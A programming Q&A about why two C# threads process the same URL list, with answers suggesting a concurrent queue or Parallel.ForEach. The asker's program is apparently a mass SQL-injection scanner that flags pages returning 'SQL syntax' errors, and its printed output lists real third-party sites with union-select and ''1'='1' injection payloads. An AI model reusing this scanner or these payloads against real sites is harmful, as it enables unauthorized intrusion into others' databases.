# C#: Why are my threads doing the same thing?

Tags: c#, multithreading

I'm writing a program to iterate through a list of sites and search for the HTML code in each site.

I have thousands of sites to check, so I want this multi-threaded.

Here is my attempt at multi-threading, but I have one problem: every thread does the same exact thing, and the results get turned twice.

### So I am successfully multi-threading, but I need to do it in a so-called "pool" (as its called in Python) so each thread checks a different URL.

```
using System;
using System.Net;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
namespace SiteHunter
{
    class MainClass
    {
        public static void Main(string[] args)
        {
            // Creates two threads that start the Work process.
            for (int i = 0; i < 2; i++)
            {
                Thread th = new Thread(Work);
                th.Start();
            }
        }

        public static void Work()
        {
            // Reads "sites.txt"
            var URLS = File.ReadLines("sites.txt");

            // Iterates through "sites.txt" line by line
            foreach (string URL in URLS)
            {

                // Try method prevents program from crashing when a URL returns a 404 or such.
                try
                {
                    // Ensures connection to the URL
                    Uri uriResult;
                    bool result = Uri.TryCreate(URL, UriKind.Absolute, out uriResult)
                        && (uriResult.Scheme == Uri.UriSchemeHttp || uriResult.Scheme == Uri.UriSchemeHttps);

                    // If the URL can connect successfully
                    if (result == true)
                    {

                        // Download the HTML
                        WebClient client = new WebClient();
                        string downloadString = client.DownloadString(URL);

                        // Check the HTML for a specific string I want to find, and print a positive result.
                        if (downloadString.Contains("SQL syntax"))
                            Console.WriteLine("\t [+] " + URL);

                        // Else, the HTML didn't contain the string, return a negative result.
                        else
                            Console.WriteLine("\t [-] " + URL);

                    // Else, the URL didn't connect successfully.
                    }
                    else
                        Console.WriteLine("\t [-] Invalid URL");

                // Catches any exceptions to prevent program crash, specifically 404's.
                }
                catch (Exception)
                {
                    Console.WriteLine("\t [-] Error in URL");
                }
            }
        }
    }
}
```

### Here's my result when running the program

```
     [-] http://4rentoxford.com/properties.php?p=40&minprice=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&maxprice=3000&minbedrooms=0&minbathrooms=0&propertytype=longterm&availability=%253E=0&furnished=%253C=1
     [-] http://4rentoxford.com/properties.php?p=40&minprice=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&maxprice=3000&minbedrooms=0&minbathrooms=0&propertytype=longterm&availability=%253E=0&furnished=%253C=1
     [-] Error in URL
     [-] Error in URL
     [+] http://7school.net/newsone.php?id=[t]
     [+] http://7school.net/newsone.php?id=[t]
     [+] http://96ut.com/stock/jikei.php?code=7261' and [t] and '1'='1&year=2015
     [+] http://96ut.com/stock/jikei.php?code=7261' and [t] and '1'='1&year=2015
     [+] http://abslatin.co.uk/node.php?id=999999.9 union all select 1,2,[t]
     [+] http://abslatin.co.uk/node.php?id=999999.9 union all select 1,2,[t]
     [+] http://accmanagementgroup.com/rental/overview.php?propertyID=[t]
     [+] http://accmanagementgroup.com/rental/overview.php?propertyID=[t]
     [+] http://accord-healthcare.com/products.php?gid=[t]
     [+] http://accord-healthcare.com/products.php?gid=[t]
     [-] Error in URL
     [-] Error in URL
     [+] http://acmlm.kafuka.org/uploader/index.php?act=viewcat&id=12999999.9' union all select 1,[t],3,4,5,6 and '0'='0
     [+] http://acmlm.kafuka.org/uploader/index.php?act=viewcat&id=12999999.9' union all select 1,[t],3,4,5,6 and '0'='0
     [-] http://advertisinghall.org/members/member_bio.php?memid=999999.9 union all select 1,2,3,4,5,[t],7
     [-] http://advertisinghall.org/members/member_bio.php?memid=999999.9 union all select 1,2,3,4,5,[t],7
```

As you can see, my threading is successful, but they're just doing the same thing. How can I prevent this?

Comment: You need to pass "Work" each subset you want the thread to process

Comment: What if I want 50 threads running? Is there a more optimal way then splitting the array?

Comment: @YoshiBMF read the contents of the file as an array and pass a subset (divide the array considering the amount of threads desired)

Comment: Getting the site list up front then using Parallel.ForEach will make it easier.

Comment: Two points here: First, no need to explicitly compare to `true` and `false`. Secondly, if you're doing something I/O-bound (rather than CPU-bound), you may want to consider async/await instead of (or in addition to) multithreading.

Comment: Put everything into a threadsafe stack and once popped, it will not be available again so next thread will not go to that url again. There are many collection types so pick the right one for the job. Furthermore I would not use raw threads but use `Task<T>`

Comment: Your code says: Hey thread1, do everything in method `Work`. Hey thread2, do everything in method `Work`. That's why they are doing the same thing because you told it so.

Comment: Stuartd, I appreciate your answer. I'm reading the list up front, and using parallel.foreach now, and it's already running much more efficiently just using a single thread.

Comment: I think you can , send list to a method which is split it pieces that you give like a parameter and get return with yield. And then put that returning list in to a ParallelForEach  and wrote a method that takes a list . you can choose thread count ın foreach ..

Answer (score 1):

Small example of how it could be:

```
public class UrlChecker
{
    private readonly int _threadsCount;
    private readonly ConcurrentQueue<string> _urlsQueue;

    public UrlChecker(int threadsCount = 1)
    {
        _threadsCount = threadsCount;
        _urlsQueue = new ConcurrentQueue<string>();
    }

    public void Start()
    {
        var threadList = new List<Thread>();
        for (int i = 0; i < _threadsCount; i++)
        {
            threadList.Add(new Thread(ProcessUrls) { IsBackground = true });
        }

        threadList.ForEach(r => r.Start());
        threadList.ForEach(r => r.Join());
    }

    public void ProcessUrls()
    {
        try
        {
            while (_urlsQueue.IsEmpty == false)
            {
                string url;
                if (_urlsQueue.TryDequeue(out url) && url != null)
                {
                    try
                    {
                        // process your url
                    }
                    catch (Exception ex)
                    {
                        // TODO: log url processing error
                    }
                }
            }
        }
        catch (Exception ex)
        {
            // TODO: log thread error
        }
    }
}
```

To execute this task just call `new UrlChecker(threadsCount: 2).Start();`